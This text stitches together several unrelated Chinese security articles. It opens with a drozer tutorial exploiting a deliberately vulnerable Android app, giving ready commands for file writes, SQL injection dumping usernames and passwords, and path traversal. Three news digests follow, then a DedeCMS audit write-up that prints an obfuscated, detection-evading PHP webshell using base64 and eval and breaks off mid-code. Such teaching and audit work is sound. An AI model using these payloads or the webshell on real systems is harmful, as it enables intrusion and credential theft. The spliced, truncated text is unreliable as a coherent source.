Android 四大组件Activity、Service、Broadcast Receiver和Content Provider是应用程序的核心组成部分，但如果实现不当，会引入严重的安全漏洞。本文将详细分析各组件常见的安全漏洞，通过漏洞代码逻辑基于 drozer 的利用方式，能够更清楚的了解具体漏洞的原理以及利用方法。 具体droze的下载和安装不详细介绍，可以自行百度，安装完成后先在android端运行drozer agent，点击开启。 在电脑端通过adb实现端口转发，并成功启动drozer adb forward tcp:31415 tcp:31415 drozer console connect 通过app.package.list的filter参数过滤alan关键词的包名称 run app.package.list --filter alan 查询该app的包信息 run app.package.info -a com.asec.alan 利用app.package.attacksurface可以查询该APP的攻击面，即漏洞的点和数量。 run app.package.attacksurface com.asec.alan 完成上述的操作后，即可对相关的漏洞进行检测分析了，接下来针对具体的组件和漏洞进行测试操作。 一、Activity Activity 作为 Android 的界面组件，负责与用户交互，其安全问题直接影响用户数据安全。 1、未授权访问漏洞 需要登录权限的 Activity 未做严格校验，导致恶意应用可直接通过 Intent 启动。 通过以下drozer命令可以查看当前app的所有activity，并确认无权限限制 run app.activity.info -a com.asec.alan 对于这些activity的执行逻辑属于 LoginActivity登录->MainActivity->InfoQueryActivity LoginActivity登录->MainActivity->FileQueryActivity 1）漏洞代码 以下为具体的代码，以LoginActivity登录->MainActivity->InfoQueryActivity场景为例，可以看到首先LoginActivity以硬编码的形式进行用户密码的判断，并使用SharePreference进行了登录态的存储 当用户密码登录成功后即可跳转MainActivity，MainActivity对登录态简单做了校验，确认其中的is_logged_in的值存在即可加载。 通过MainActivity跳转到InfoQueryActivity直接进行点击事件的监听跳转 该acitivity直接加载，未进行登录态的校验 通过上述APP代码的分析，可以判断出MainActivity的加载做了简单的登录态校验，但是如果已经登录过，且登录态写入到user_prefs.xml中后，只要不进行删除即可直接通过命令加载成功实现绕过；InfoQueryActivity的加载并未做任何校验，可以尝试直接进行加载。 2）漏洞利用 MainActivity加载： 基于上述代码逻辑的分析，接下来通过drozer命令进行利用测试，如果已经登录过APP，则在该程序目录会生成user_prefs.xml文件，里面会写入"is_logged_in"的值为true MainActivity的加载可直接通过drozer命令加载 run app.activity.start --component com.asec.alan com.asec.alan.MainActivity 执行后成功记载MainActivity 删除user_prefs.xml文件，再利用drozer命令尝试加载MainActivity则失败 InfoQueryActivity加载： InfoQueryActivity则通过app.activity.start命令直接加载即可。 run app.activity.start --component com.asec.alan com.asec.alan.InfoQueryActivity 3）修复建议 二、Service Service 用于后台处理任务，若存在漏洞可能导致敏感操作被恶意调用。 新建一个用于漏洞测试的service，并写入一些漏洞的逻辑 service组件运行导出 通过drozer命令可以查询支持导出的service组件信息，支持导出则可能存在对应的漏洞。 run app.service.info -a com.asec.alan 1、任意文件写入漏洞 在 Android Service 场景中，当服务接收外部传入的文件路径参数并直接用于文件写入操作时，覆盖应用自身关键文件（配置文件、数据库等），导致应用的使用或者安全风险问题。 1）漏洞代码 当 Service 处理"com.asec.alan.ACTION_WRITE_FILE"动作时，会从 Intent 中直接读取filePath参数及需要写入的内容，并通过writeToFile()方法写入内容。但是writeToFile()直接使用传入的filePath创建File对象，未检查路径是否限制在应用私有目录 2）漏洞利用 通过drozer命令向/data/data/com.asec.alan/写入drozer_test.txt文件，文件内容为Test from drozer run app.service.start --action com.asec.alan.ACTION_WRITE_FILE --component com.asec.alan com.asec.alan.VulnerableService --extra string file_path "/data/data/com.asec.alan/drozer_test.txt" --extra string content "Test from drozer" 利用adb shell连接android系统，切换为root权限后查看drozer_test.txt的存在和内容 adb shell su ls /data/data/com.asec.alan/drozer_test.txt cat /data/data/com.asec.alan/drozer_test.txt 2、敏感信息泄露漏洞 敏感信息泄露指应用在运行过程中，将不应公开的敏感数据（如密码、密钥、令牌等）以明文形式存储、传输或输出，导致未授权主体可获取这些信息。 1）漏洞代码 当 Service 处理"com.asec.alan.ACTION_GET_SECRET"动作时，getSensitiveInformation()方法会返回包含数据库密码、API 密钥等核心敏感数据，并通过Log.d()输出到系统日志 2）漏洞利用 利用drozer命令启动com.asec.alan com.asec.alan.VulnerableService服务 run app.service.start --action com.asec.alan.ACTION_GET_SECRET --component com.asec.alan com.asec.alan.VulnerableService 通过adb的logcat查看对应的日志，成功打印出对饮的敏感数据。 adb logcat VulnerableService:D *:S 三、Broadcast Receiver Broadcast Receiver 用于接收系统或应用间的广播，若实现不当会导致信息泄露或恶意调用。 1、伪造恶意广播漏洞 Receiver 未验证广播发送者身份，恶意应用可伪造广播触发敏感操作。 1）漏洞代码 该接收器未对广播发送者的身份进行任何验证，任何应用都可以发送com.asec.alan.ACTION_SENSITIVE_OPERATION动作的广播来触发其逻辑。并通过performSensitiveOperation方法执行敏感操作，测试使用Toast在界面弹窗展示，但整个调用链都没有权限检查机制。 2）漏洞利用 利用drozer伪造恶意广播并触发该接收器 run app.broadcast.send --action com.asec.alan.ACTION_SENSITIVE_OPERATION --component com.asec.alan com.asec.alan.VulnerableReceiver --extra string operation "test" --extra string data "test" 通过界面可以查看到对应的广播信息 四、Content Provider Content Provider 用于数据共享，是最容易出现安全问题的组件，常见漏洞包括信息泄露、SQL 注入和目录遍历。 1、信息泄露漏洞 Content Provider 未限制访问权限，导致应用内敏感数据（如用户信息、数据库）可被任意读取。 1）漏洞代码： 通过该代码可以发现，未检查调用者是否有读取权限，可以直接调用sql进行数据的查询。 2）漏洞利用 利用drozer命令可以查看该APP的provider的信息 run app.provider.info -a com.asec.alan 利用app.provider.finduri可以查看所有的uri run app.provider.finduri com.asec.alan 通过drozer查询content://com.asec.alan.provider/该uri的数据 run app.provider.query content://com.asec.alan.provider/ 2、SQL 注入漏洞 Content Provider 在处理查询时直接拼接 SQL 语句，未使用参数化查询，导致 SQL 注入。 1）漏洞代码 通过代码发现将selection参数直接拼接进 SQL 查询字符串，未使⽤参数化查询或输⼊净化，完全信任外部输⼊。并且忽略了selectionArgs参数，该参数本应⽤于安全传递查询参数，调⽤rawQuery时未使⽤参数绑定功能，⽽是传递null。 2）漏洞利用 利用drozer的scanner.provider.injection可以查询该APP的Content Provider存在的SQL注入 run scanner.provider.injection -a com.asec.alan 基于sql注入漏洞的测试和利用，通过order by进行显示位的判断 run app.provider.query content://com.asec.alan.provider/ --selection "1=1 order by 2" run app.provider.query content://com.asec.alan.provider/ --selection "1=1 order by 3" run app.provider.query content://com.asec.alan.provider/ --selection "1=1 order by 4" 并进行username和password数据的查询。 run app.provider.query content://com.asec.alan.provider/ --selection "1=1 UNION SELECT 1,username,password FROM users--" 3、目录遍历漏洞 Content Provider 的openFile()方法未验证文件路径，导致攻击者可访问应用沙盒外的任意文件。 1）漏洞代码 代码中使用uri.getEncodedPath()获取路径，未处理../或..\等路径跳转符，用户可控的uriPath直接与基础目录baseDir拼接，并没有对访问的文件类型、路径范围进行权限校验。 2）漏洞利用 利用drozer的scanner.provider.traversal对目录遍历漏洞进行检测，发现对应的uri run scanner.provider.traversal -a com.asec.alan 并成功查询/system/etc/hosts文件内容 run app.provider.read content://com.asec.alan.provider/../../../../system/etc/hosts 本文利用drozer工具基于该APP的测试和操作，其实对于android app的组件漏洞的测试还有很多方法，通过其对四大组件的系统性检测，可有效发现权限控制缺失、输入验证不足等高危漏洞。在实际测试中，需结合静态代码分析（如查看 AndroidManifest.xml 的组件配置）与 Drozer 的动态交互测试，形成 "静态枚举 + 动态验证" 的闭环，才能全面评估组件的安全状态，为漏洞修复提供精准依据。 APP地址: https://pan.baidu.com/s/1l1thGur7wmMBXLWivqW6cg?pwd=4ggk 提取码: 4ggk

1、Windows漏洞被利用投递PipeMagic勒索软件 https://securelist.com/pipemagic/117270/ 研究人员披露，威胁行为者正在利用微软Windows已修复的漏洞CVE-2025-29824（CLFS权限提升漏洞），投递PipeMagic恶意软件并实施RansomExx勒索攻击。据卡巴斯基与BI.ZONE报告，PipeMagic早在2022年就被用于针对东南亚工业企业的攻击，具备远程访问和命令执行能力。近期攻击主要发生在沙特和巴西，利用微软Azure托管组件，并通过伪装成微软帮助文件或假冒ChatGPT客户端作为加载器。微软将这些活动归因于威胁组织Storm-2460。该恶意软件采用模块化设计，并通过加密管道 2、PyPI封禁1800过期域名邮箱防供应链攻击 https://blog.pypi.org/posts/2025-08-18-preventing-domain-resurrections/ Python软件包索引库（PyPI）宣布实施新安全措施，主动检测并阻止与过期域名相关的邮箱，以防止账户被接管和供应链攻击。自2025年6月以来，PyPI已取消验证超1800个因域名过期而失效的邮箱，避免攻击者通过购买过期域名并利用密码重置功能接管维护者账户。这一风险在2022年已有先例，攻击者曾利用类似手法接管ctx库账户并上传恶意版本。虽然该措施并非万无一失，但可有效缩减攻击面，尤其对已被遗弃但仍广泛使用的软件包具有重要意义。PyPI强调，新机制能 3、英国撤销对苹果加密后门要求 https://thehackernews.com/2025/08/uk-government-drops-apple-encryption.html 英国政府已放弃强制苹果削弱加密并设置后门的计划，此举原本将允许访问美国公民的受保护数据。美国国家情报总监图尔西·加巴德在社交平台X上表示，美英双方经过数月沟通，最终促成英国撤销相关命令，以保障美国公民的公民自由。今年1月，英国内政部曾依据《调查权力法》向苹果下达技术能力通知，要求其为iCloud等端到端加密数据提供普遍访问途径，苹果随后在英国关闭了高级数据保护功能并提出法律上诉。批评人士指出，强制访问加密数据等同于建立后门，可能被犯罪分子或威 4、SAP组合漏洞利用工具公开威胁未修补系统 https://onapsis.com/blog/new-exploit-for-cve-2025-31324/ 安全公司Onapsis警告，新的公开利用工具正在滥用SAP NetWeaver的两个关键漏洞CVE-2025-31324和CVE-2025-42999，能够绕过认证并实现远程代码执行。尽管SAP已在今年4月和5月修补，但相关漏洞自3月起已被威胁组织作为零日利用。Qilin、BianLian、RansomExx等勒索团伙以及部分中国背景的间谍组织均被发现利用该链式攻击，目标涉及关键基础设施。该漏洞链允许攻击者上传任意文件、执行系统命令，并以SAP管理员权限完全接管业务数据与流程。研 5、研究人员将发布了FortiWeb身份验证完全绕过漏洞利用代码 https://www.anquanke.com/post/id/311301 一名安全研究人员发布了针对 FortiWeb 网络应用防火墙漏洞的部分概念性利用工具，该漏洞允许远程攻击者绕过认证。该漏洞已通过负责任的方式报告给 Fortinet，并被追踪为 CVE-2025-52970。Fortinet 已于 8 月 12 日发布修复补丁。 6、PostgreSQL核心组件曝高危漏洞，官方发布紧急修复补丁 https://www.anquanke.com/post/id/311307 PostgreSQL 全球开发组宣布了一项重要安全更新，影响所有受支持版本的 PostgreSQL 关系型数据库。此次更新适用于 PostgreSQL 17.6、16.10、15.14、14.19 和 13.22，以及 PostgreSQL 18 beta3。公告表示，本次更新共修复了 3 个安全漏洞，并修复了过去几个月内报告的 55 个以上缺陷。 7、攻击者正利用趋势科技Apex One命令注入漏洞 https://cybersecuritynews.com/cisa-warns-trend-micro-apex-one-flaw/ CISA警告趋势科技Apex One管理控制台存在高危漏洞CVE-2025-54948，攻击者可远程执行任意命令，无需认证。建议立即安装补丁或停用产品，CVSS评分9.8，风险极高。 8、"Noodlophile"恶意活动升级：利用版权钓鱼扩大全球攻击范围 https://thehackernews.com/2025/08/noodlophile-malware-campaign-expands.html "Noodlophile"恶意软件通过升级的钓鱼邮件和传播机制，针对多国企业窃取信息。攻击手法包括利用合法软件漏洞、Telegram混淆部署和动态载荷技术，重点窃取浏览器数据，并计划扩展键盘记录等功能，威胁持续升级。 9、新型GodRAT木马利用隐写术攻击金融交易机构 https://www.freebuf.com/articles/444948.html 卡巴斯基研究员Saurabh Sharma在最新技术分析报告中披露，金融交易和经纪公司正成为新型远程访问木马GodRAT的攻击目标。攻击者通过Skype即时通讯工具分发伪装成财务文档的恶意.SCR（屏幕保护程序）文件。该恶意活动最早可追溯至2024年9月9日，主要针对中国香港、阿联酋、黎巴嫩、马来西亚和约旦等地区。攻击采用隐写术（steganography）技术，将用于从C2服务器下载恶意软件的shellcode隐藏在图像文件中。 10、Smartbi存在远程代码执行漏洞 https://www.secrss.com/articles/82146 近日，奇安信CERT监测到官方修复Smartbi 远程代码执行漏洞(QVD-2025-31926)，该漏洞源于攻击者可通过默认资源ID绕过身份验证获取权限，配合后台接口实现远程代码执行，可能导致服务器被完全控制、数据泄露或业务系统沦陷。鉴于该漏洞影响范围较大，建议客户尽快做好自查及防护。 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究员披露FortiWeb认证绕过漏洞 https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970 2025年8月，安全研究员Aviv Y公布了FortiWeb存在的严重漏洞（CVE-2025-52970）细节，并演示部分利用方法。该漏洞源于Cookie解析中的越界读取，使攻击者可触发Era参数异常，令服务器使用全零密钥进行会话加密与签名，从而轻易伪造认证Cookie并实现完整身份绕过，甚至冒充管理员。漏洞影响FortiWeb 7.0至7.6版本，Fortinet已于8月12日发布修复补丁，8.0版本不受影响。虽然攻击需受害者有活跃会话，并需对一个数值字段进行暴力破解，但搜索范 2、Workday遭Salesforce数据泄露事件波及 https://blog.workday.com/en-us/protecting-you-from-social-engineering-campaigns-update-from-workday.html 2025年8月，人力资源巨头Workday披露其数据遭遇泄露，起因是第三方CRM平台在社会工程攻击中被入侵。公司确认攻击者未能访问客户租户数据，但部分业务联系信息（如姓名、邮箱、电话）已外泄，可能被用于后续钓鱼与诈骗。事件最早于8月6日被发现。攻击者冒充人事或IT人员，通过短信和电话诱骗员工泄露敏感信息。据悉，该事件与近期ShinyHunters组织针对Salesforce实例的全球攻 3、微软Teams引入多项安全升级加强安全防护 https://www.microsoft.com/ro-ro/microsoft-365/roadmap?id=499893 2025年8月，微软宣布将为Teams引入多项安全升级，以应对恶意URL与高风险文件的威胁。根据Microsoft 365路线图，Teams将阻止在聊天和频道中传播可被武器化的文件类型（如可执行文件），并可检测、提醒用户恶意链接，降低恶意软件入侵风险。此外，Teams现已与Microsoft Defender for Office 365的租户阻止列表集成，管理员可直接封禁来自恶意域的聊天、会议与通话，并清除已有记录。该功能预计9月底前全球普及。微软今年还陆续上线屏 4、数百个TeslaMate因配置错误暴露特斯拉车辆敏感数据 https://cybersecuritynews.com/teslamate-leaks-vehicle-data/ 数百个TeslaMate实例因配置错误暴露特斯拉车辆敏感数据，包括GPS坐标和驾驶习惯。研究人员通过全网扫描发现漏洞，建议车主立即加强身份验证和访问控制，防止隐私泄露。 5、高危tar-fs漏洞致数百万系统面临任意文件写入风险 https://securityonline.info/cve-2025-48387-critical-tar-fs-vulnerability-exposes-millions-to-arbitrary-file-writes/ 高危漏洞CVE-2025-48387影响NPM包tar-fs，允许恶意tar文件通过目录遍历攻击任意写入系统文件，波及数万依赖项目。建议立即升级至v3.0.9/v2.1.3/v1.16.5或限制不可信文件解压。 6、1580万组PayPal明文凭证在黑客论坛兜售，或源自信息窃取恶意软件 https://hackread.com/threat-actor-selling-plain-text-paypal-credentials/ 黑客出售1580万组PayPal账户数据，含邮箱、明文密码及登录链接，标价750美元。数据或源自恶意软件窃取，可能引发凭证填充攻击。真实性待PayPal官方确认，若属实将成近年最大相关泄露事件之一。 7、Windows 11 24H2安全更新引发存储设备故障及数据损坏风险 https://cybersecuritynews.com/windows-11-24h2-security-update/ 微软KB5063878安全更新导致Windows 11 24H2用户SSD/HDD无法访问或数据损坏，尤其在大文件操作时风险加剧。建议暂缓安装更新并备份数据，微软尚未提供官方修复方案。 8、AMI Aptio UEFI 固件新漏洞威胁系统持久性安全 https://securityonline.info/new-firmware-flaw-in-ami-aptio-uefi-threatens-persistent-system-compromise/ AMI Aptio UEFI固件曝高危SMM漏洞（CVE-2025-33043），攻击者可利用指针验证缺陷在最高特权环境执行任意代码，实现持久性控制。建议立即安装厂商补丁，该漏洞影响广泛供应链设备。 9、Linux内核netfilter漏洞可导致攻击者权限提升 https://www.freebuf.com/articles/system/444775.html Linux内核netfilter的ipset子系统中发现一个高危漏洞，允许本地攻击者将权限提升至root级别。该漏洞存在于ipset框架的bitmap:ip实现中，源于处理CIDR格式IP地址范围时缺乏足够的范围验证。由于缺少边界检查，攻击者可触发内核空间的越界内存写入，最终实现完全控制系统。 10、2017年Office漏洞为何仍在威胁企业安全 https://securityonline.info/a-blast-from-the-past-why-a-2017-office-flaw-still-haunts-enterprises-today/ 微软Office漏洞CVE-2017-11882仍被利用，攻击者通过恶意文档实现远程代码执行。尽管微软2018年修复漏洞，但使用旧版的企业（如制造业）易受钓鱼攻击，需警惕伪装订单的恶意文件。 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究发现微软Entra ID可被降级绕过FIDO认证 https://www.proofpoint.com/us/blog/threat-insight/dont-phish-let-me-down-fido-authentication-downgrade Proofpoint研究人员披露，一种新型降级攻击可在微软Entra ID中绕过FIDO无密码认证，迫使用户改用安全性较低的验证方式，从而使账号暴露于网络钓鱼与会话劫持风险。该方法通过Evilginx框架中的自定义“phishlet”伪装不支持FIDO的浏览器（如Windows版Safari），触发系统关闭FIDO认证并提示用户使用短信验证码、Authenticator应用或一次性密码等替 2、美司法部扣押BlackSuit逾百万美元加密资产 https://www.bleepingcomputer.com/news/security/us-govt-seizes-1-million-in-crypto-from-blacksuit-ransomware-gang/ 美国司法部宣布，已于2024年1月9日从BlackSuit勒索软件团伙扣押价值1091453美元的加密货币和数字资产。这笔资金源自2023年4月一起勒索案，受害者为获取解密工具支付了49.3枚比特币。执法部门追踪到黑客多次通过虚拟货币交易所转移资金以掩盖踪迹，最终在合作交易所冻结资产。本次行动继国际联合“将死行动”关闭BlackSuit暗网勒索门户后展开，严重打击了该 3、黑客泄露安联人寿280万条敏感数据 https://www.bleepingcomputer.com/news/security/hackers-leak-allianz-life-data-stolen-in-salesforce-attacks/ 美国保险巨头安联人寿（Allianz Life）遭黑客泄露约280万条来自Salesforce系统的敏感数据，涉及客户及业务合作伙伴信息。该事件源于7月16日的第三方云端CRM数据泄露，疑为ShinyHunters团伙发起，并与“Scattered Spider”“Lapsus$”有重叠。泄露数据包括姓名、地址、电话、出生日期、税号及执业资质等信息，受影响对象涵盖财富管理公司、经 4、全球行动冻结逾3亿美元涉诈加密资产 https://www.trmlabs.com/resources/blog/t3-financial-crime-unit-launches-t3-global-collaborator-program-over-250m-in-criminal-assets-frozen-as-binance-becomes-first-member 全球执法机构与区块链企业协作，成功冻结超3亿美元与网络犯罪及诈骗相关的加密货币资产。其中，T3金融犯罪单位（T3 FCU）联合TRM Labs、TRON、Tether及币安，自2024年9月以来已冻结超2.5亿美元非法资产，并打击“杀猪盘”等诈骗活动。另一 5、Plex紧急提醒用户修补安全漏洞 https://forums.plex.tv/t/plex-media-server/30447/687 媒体服务平台Plex于8月14日向部分用户发出紧急通知，要求立即更新Plex Media Server，以修补近期发现的安全漏洞。该漏洞影响版本为1.41.7.x至1.42.0.x，目前已在最新版本1.42.1.10060中修复。漏洞通过漏洞赏金计划被发现，尽管Plex尚未公布具体技术细节及CVE编号，但公司强调应尽快更新，以防攻击者逆向补丁并开发利用工具。此次官方通过邮件直接提醒用户更新，凸显问题的潜在严重性。鉴于Plex曾出现过被积极利用的远程代码执行漏洞，安全专家警告用户务必立即升 6、Cisco警告防火墙管理中心严重漏洞 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-radius-rce-TNBKf79 思科发布安全警告称，其Secure Firewall Management Center（FMC）软件RADIUS子系统存在严重远程代码执行漏洞（CVE-2025-20265），危害等级最高10分。攻击者可在认证阶段利用特制输入绕过验证，执行任意高权限命令。该漏洞影响FMC 7.0.7和7.7.0版本，当启用RADIUS认证时风险尤高。思科已提供修复补丁，建议立即更新；若无法 7、安卓木马PhantomCard滥用NFC窃取银行卡 https://www.threatfabric.com/blogs/phantomcard-new-nfc-driven-android-malware-emerging-in-brazil 研究人员发现一种名为PhantomCard的新型安卓木马在巴西活跃，该恶意软件通过NFC中继攻击窃取受害者银行卡信息并实现欺诈交易。木马伪装为“卡片保护”应用，借助仿冒的Google Play网页传播，并诱导用户将银行卡贴近手机以“验证”。实际上，应用会将卡片数据和PIN码传送至攻击者控制的NFC中继服务器，从而在POS机或ATM上完成交易，就像持有实体卡片一样。PhantomCard由NFC中继恶意 8、俄罗斯团伙利用MSC漏洞投放Fickle Stealer恶意软件 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-hackers-call-social-engineering-abusing-brave-support-and-encrypthubs-expanding-arsenal/ 安全研究人员披露，俄罗斯黑客组织EncryptHub（又名LARVA-208、Water Gamayun）正利用微软管理控制台（MMC）框架漏洞CVE-2025-26633（“MSC EvilTwin”）发动攻击。该组织通过伪装为IT部门在Teams中发送请求，诱导目标执行伪造的M 9、HTTP/2新漏洞“MadeYouReset”引发DoS风险 https://deepness-lab.org/publications/madeyoureset/ 研究人员揭示，HTTP/2协议存在名为“MadeYouReset”的新漏洞（CVE-2025-8671），可被滥用发动大规模拒绝服务攻击。该漏洞突破了服务器通常限制的每连接100个并发请求上限，使攻击者能发送成千上万请求，导致合法用户无法访问，甚至引发内存崩溃。受影响产品包括Apache Tomcat（CVE-2025-48989）、F5 BIG-IP（CVE-2025-54500）和Netty（CVE-2025-55163）。漏洞利用方式与Rapid Reset类似，但攻击者无需主动发送 10、挪威水坝遭亲俄黑客破坏 https://www.vg.no/nyheter/i/mPJaE4/pst-sjefen-mener-pro-russiske-hackere-sto-bak-cyberangrepet-mot-damanlegget-i-bremanger 挪威警方安全局（PST）确认，亲俄黑客于今年4月入侵布雷曼格水坝的关键控制系统，远程开启泄洪阀门，导致720万升水在四小时内被排放。尽管事件未造成严重损害，但黑客通过发布控制面板视频在Telegram上展示入侵成果，意在彰显其能力并制造恐慌。PST局长指出，此类行动更多是影响和施压手段，而非单纯破坏。挪威情报部门则警告，俄罗斯正通过混合攻击手段持续对 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 书接上文，在上次意外搞出的免杀 webshell 条件下，最近又去审计了一个织梦 CMS 官方网站 https://www.dedecms.com/ 最后成功利用免杀 webshell 实现了 RCE，下面是审计过程和审计思路 环境搭建 去官网下载源码，然后配合 phpstudy 搭建就 ok 了 这个比较简单，注意根目录需要放 upload 目录 注意默认的管理员目录是 dede，访问/dede/login.php 默认账户密码adminadmin 代码审计 这里我只找 RCE 漏洞 首先对于 php 的话，就是找 sink 点，或者在后台功能点去看，一般审计多了，看到功能点就大概能猜出有哪些漏洞 sink 点的话可以使用一个工具 Seay 源代码审计系统 https://github.com/f1tz/cnseay虽然比较粗糙，误报很多，不过相比于语义分析的工具更能提升代码审计的技术 我们直接把源码丢进去就可以了 可以看到这个工具确实不太准确，因为 sink 点实在太多，不过熟练后，一眼就知道哪些不需要去管的 然后这里我只关注能够 RCE 的漏洞 找到之后没有什么技巧，就是回头看参数是否可以控制 下面举个例子 案例 1 比如这句话，一眼就感觉有漏洞，我们就需要去详细查看一下 <?php /*<meta name="9Rrdzo" content="a">*/ $password='UaUahObGMzTnBiMjVmYzNSaGNuUW9LVHNLUUhObGRGOTBhVzFsWDJ4cGJXbDBLREFwT3dwQVpYSnliM0pmY21Wd2aIzSjBhVzVuS0RBcE93cG1kVzVqZEdsdmJpQmxibU52WkdVb0pFUXNKRXNwZXdvZ0lDQWdabTl5S0NScFBUQTdKR2s4YzNSeWJHVnVLQ1JFS1Rza2FTc3JLU0I3Q2lBZ0lDQWdJQ0FnSkdNZ1BTQWtTMXNrYVNzeEpqRTFYVHNLSUNBZ0lDQWdJQ0FrUkZza2FWMGdQU0 $username = get_meta_tags(__FILE__)[$_GET['token']]; header("ddddddd:".$username); $arr = apache_response_headers(); $template_source=''; foreach ($arr as $k => $v) {    if ($k[0] == 'd' && $k[5] == 'd') {        $template_source = str_replace($v,'',$password);   }} $template_source = base64_decode($template_source); $template_source = base64_decode($template_source); $key = 'template_source'; $aes_decode[1]=$key; @eval($aes_decode[1]); $NkM1M7 = ".............."; if( count($_REQUEST) || file_get_contents("php://input") ){ }else{    header('Content-Type:text/html;charset=utf-8');    http_response_code(405);    echo base64_decode/**/($NkM1M7); } 我们可以看到这个参数其实是不能控制的 `aes_decode[1]就是 $key,等价于$template_source $template_source = str_replace($v, '', $password); 来源于$password 而其中 password 是固定的，所以不可以控制 案例 2 function DeleteFile($filename)   {        $filename = $this->baseDir.$this->activeDir."/$filename";        if(is_file($filename))       {            @unlink($filename); $t="文件";       }        else       {            $t = "目录";            if($this->allowDeleteDir==1)           {                $this->RmDirFiles($filename);           } else           {                // 完善用户体验，by:sumic                ShowMsg("系统禁止删除".$t."！","file_manage_main.php?activepath=".$this->activeDir);                exit;           }                   }        ShowMsg("成功删除一个".$t."！","file_manage_main.php?activepath=".$this->activeDir);        return 0;   } } 是一个方法，这种需要寻找调用这个方法的地方 else if($fmdo=="del") {    $fmm->DeleteFile($filename); } 这种是一个典型的控制器，根据 fmdo 来选择对应的操作 不过根据所在的文件的注释 /** * 文件管理控制 * * @version       $Id: file_manage_control.php 1 8:48 2010年7月13日 $ * @package       DedeCMS.Administrator * @founder       IT柏拉图, https://weibo.com/itprato * @author         DedeCMS团队 * @copyright     Copyright (c) 2004 - 2024, 上海卓卓网络科技有限公司 (DesDev, Inc.) * @license       http://help.dedecms.com/usersguide/license.html * @link           http://www.dedecms.com */ 这里就能大概猜到了 是一个文件管理器，可能对应着删除按钮，我们尝试能不能目录穿越 不过这里是做了限制的 $filename = preg_replace("#([.]+[/]+)*#", "", $filename); 移除 ../ 形式的路径穿越字符 而且下面还会直接移除.. 所以考虑放弃 案例 3 定位到 sys_sql_query.php 文件了 发现可以执行 sql if(preg_match("#^select #i", $sqlquery))   {        $dsql->SetQuery($sqlquery);        $dsql->Execute();        if($dsql->GetTotalRow()<=0)       {            echo "运行SQL：{$sqlquery}，无返回记录！";       }        else       {            echo "运行SQL：{$sqlquery}，共有".$dsql->GetTotalRow()."条记录，最大返回100条！";       }        $j = 0;        while($row = $dsql->GetArray())       {            $j++;            if($j > 100)           {                break;           }            echo "<hr size=1 width='100%'/>";            echo "记录：$j";            echo "<hr size=1 width='100%'/>";            foreach($row as $k=>$v)           {                echo "<font color='red'>{$k}：</font>{$v}<br/>\r\n";           }       }        exit();   }    if($querytype==2)   {        //普通的SQL语句        $sqlquery = str_replace("\r","",$sqlquery);        $sqls = preg_split("#;[ \t]{0,}\n#",$sqlquery);        $nerrCode = ""; $i=0;        foreach($sqls as $q)       {            $q = trim($q);            if($q=="")           {                continue;           }            $dsql->ExecuteNoneQuery($q);            $errCode = trim($dsql->GetError());            if($errCode=="")           {                $i++;           }            else           {                $nerrCode .= "执行： <font color='blue'>$q</font> 出错，错误提示：<font color='red'>".$errCode."</font><br>";           }       }        echo "成功执行{$i}个SQL语句！<br><br>";        echo $nerrCode;   }    else   {        $dsql->ExecuteNoneQuery($sqlquery);        $nerrCode = trim($dsql->GetError());        echo "成功执行1个SQL语句！<br><br>";        echo $nerrCode;   }    exit(); } 而且 sql 语句是可以控制的 跟进执行的地方发现 function Execute($id="me", $sql='') {      global $dsqli; if(!$dsqli->isInit) { $this->Init($this->pconnect); }      if($dsqli->isClose)     {          $this->Open(FALSE);          $dsqli->isClose = FALSE;     }      if(!empty($sql))     {          $this->SetQuery($sql);     }      //SQL语句安全检查      if($this->safeCheck)     {          CheckSql($this->queryString);     }      $t1 = ExecTime();      //var_dump($this->queryString);      $this->result[$id] = mysqli_query($this->linkID, $this->queryString); //var_dump(mysql_error());      //查询性能测试      if($this->recordLog) { $queryTime = ExecTime() - $t1;          $this->RecordLog($queryTime);          //echo $this->queryString."--{$queryTime}<hr />\r\n";     }      if($this->result[$id]===FALSE)     {          $this->DisplayError(mysqli_error($this->linkID)." <br />Error sql: <font color='red'>".$this->queryString."</font>");     } } 是有一个 checksql 的检查的 //SQL语句过滤程序，由80sec提供，这里作了适当的修改 if (!function_exists('CheckSql')) {    function CheckSql($db_string,$querytype='select')   {        global $cfg_cookie_encode;        $clean = '';        $error='';        $old_pos = 0;        $pos = -1;        $log_file = DEDEINC.'/../data/'.md5($cfg_cookie_encode).'_safe.txt';        $userIP = GetIP();        $getUrl = GetCurUrl();        //如果是普通查询语句，直接过滤一些特殊语法        if($querytype=='select')       {            $notallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}";            //$notallow2 = "--|/\*";            if(preg_match("/".$notallow1."/i", $db_string))           {                fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||SelectBreak\r\n");                exit("<font size='5' color='red'>Safe Alert: Request Error step 1 !</font>");           }       }        //完整的SQL检查        while (TRUE)       {            $pos = strpos($db_string, '\'', $pos + 1);            if ($pos === FALSE)           {                break;           }            $clean .= substr($db_string, $old_pos, $pos - $old_pos);            while (TRUE)           {                $pos1 = strpos($db_string, '\'', $pos + 1);                $pos2 = strpos($db_string, '\\', $pos + 1);                if ($pos1 === FALSE)               {                    break;               }                elseif ($pos2 == FALSE || $pos2 > $pos1)               {                    $pos = $pos1;                    break;               }                $pos = $pos2 + 1;           }            $clean .= '$s#39;;            $old_pos = $pos + 1;       }        $clean .= substr($db_string, $old_pos);        $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));        if (strpos($clean, '@') !== FALSE  OR strpos($clean,'char(')!== FALSE OR strpos($clean,'"')!== FALSE        OR strpos($clean,'$s$s#39;)!== FALSE)       {            $fail = TRUE;            